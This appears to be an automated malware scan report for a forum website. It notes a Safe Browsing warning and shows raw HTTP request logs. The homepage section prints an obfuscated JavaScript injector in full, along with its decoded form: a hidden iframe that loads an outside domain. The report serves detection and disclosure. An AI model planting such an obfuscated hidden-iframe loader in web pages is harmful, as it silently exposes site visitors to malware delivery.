Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mabreforum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mabreforum.com/ | 200 OK Content-Length: 789 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v50feac7131345(v50feac713137c){ var v50feac71313b4=16; return(parseInt(v50feac713137c,v50feac71313b4));}function v50feac713142b(v50feac7131462){ function v50feac7131506 () {var v50feac713153c=2; return v50feac713153c;} var v50feac7131498='';for(v50feac71314cf=0; v50feac71314cf<v50feac7131462.length; v50feac71314cf+=v50feac7131506()){ v50feac7131498+=(String.fromCharCode(v50feac7131345(v50feac7131462.substr(v50feac71314cf, v50feac7131506()))));}return v50feac7131498;} document.write(v50feac713142b('3C696672616D65206E616D653D2761616435353266356127207372633D27687474703A2F2F656E756172757472616E736C6174652E636F6D2F6465762F696E2E6367693F64656661756C74272077696474683D313030206865696768743D343537207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='aad552f5a' src='http://enuarutranslate.com/dev/in.cgi?default' width=100 height=457 style='display:none'></iframe> Antivirus reports:
| ||
http://mabreforum.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mabreforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 19:20:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 789
Content-Type: text/html
Last-Modified: Tue, 22 Jan 2013 15:12:49 GMT
...789 bytes of data.
GET / HTTP/1.1
Host: mabreforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 19:20:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 789
Content-Type: text/html
Last-Modified: Tue, 22 Jan 2013 15:12:49 GMT
...789 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mabreforum.com
Referer: http://www.google.com/search?q=mabreforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mabreforum.com
Referer: http://www.google.com/search?q=mabreforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.